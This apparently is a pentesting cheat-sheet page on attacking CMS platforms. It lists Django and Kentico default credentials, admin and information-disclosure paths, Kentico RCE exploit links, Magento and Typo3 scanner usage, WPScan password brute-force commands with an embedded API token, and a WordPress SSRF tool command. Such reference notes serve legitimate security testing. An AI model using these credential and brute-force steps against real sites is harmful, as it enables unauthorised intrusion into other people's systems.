Initializing VAULT-TEC OS...
Loading security protocols...
Establishing secure connection...
Connection established.
SYSTEM READY

Vault-Tec Terminal

ABOUT POSTS NOTES TOOLS

CheatSheets

CURL DNS File Transfer Hydra Impacket JohnTheRipper NCAT NMAP Online Resources Reverse Shell Wordlists

Active Directory

Mindmap Attacking AD Linux AD

Cloud

AWS Azure Google Terraform

Container

Docker Kubernetes

Linux

Penetration Testing Checklist Enumeration Privilege Escalation Post Exploitation Services Tools

Network

Data Exfiltration Port Scanning Reconnaissance Pivoting Services Traffic Analysis

Tech Stack

CMS Databases DevOps Enterprise Apps IAM Monitoring Open-Source Utilities Web Servers

Windows

AV/EDR Evasion Enumeration Privilege Escalation Post Exploitation

Web Application

Reconnaissance Common Vulnerabilities Authentication Bypass API Testing

Pentesting CMS

AEM

aem-hacker Tool
RCE - Medium article

Django

#Admin panel endpoint
/admin/login/?next=/admin/

#Default credentials
admin:admin

Kentico

#Default credentials
administrator:<blank>

#Kentico version disclosure
/CMSPages/GetDocLink.ashx
/CMSHelp/ 

#Kentico exploit 11-12
[Kentico-RCE](https://github.com/Kr0ff/Kentico-12-RCE-via-SyncServer)

#Kentico user information disclosure
/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx

Magento

Magento CMS scanner
magescan

Usage:
php magescan.phar scan:all www.example.com

Other references:
Magento Security Resources

Typo3

Typo3 CMS scanner
Typo3Scan

Usage:
python3 typo3scan.py -d http://dev01.vm-typo3.loc/ --vuln

WordPress

WPScan tool:
WPScan

#Password BruteForce
wpscan --url https://site.com/wp-login.php -e u -U admin --passwords ~/SecList/Passwords/2020-200_most_used_passwords.txt

#Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token zO9kMVezPe57YcCK8a1kDIsKjEhKzORz2wbhUSQYXcU --passwords ~/Tools/SecLists/Passwords/probable-v2-top1575.txt 

#SecLists:
- /Passwords/2020-200_most_used_passwords.txt
- /Passwords/Honeypot-Captures/Sucuri-Top-Wordpress-Passwords.txt
- /Passwords/Common-Credentials/500-worst-passwords.txt

Wordpress Cheat-Sheet Wiki:
hacktricks
hackertarget.com

WordPress SSRF tool:
quickpress

#Usage
./quickpress -target https://target.com -server http://burpcollaborator.net

Collection of Exploits, CVES(Unauthenticated) and Wordpress Scanners
Wordpress-Exploits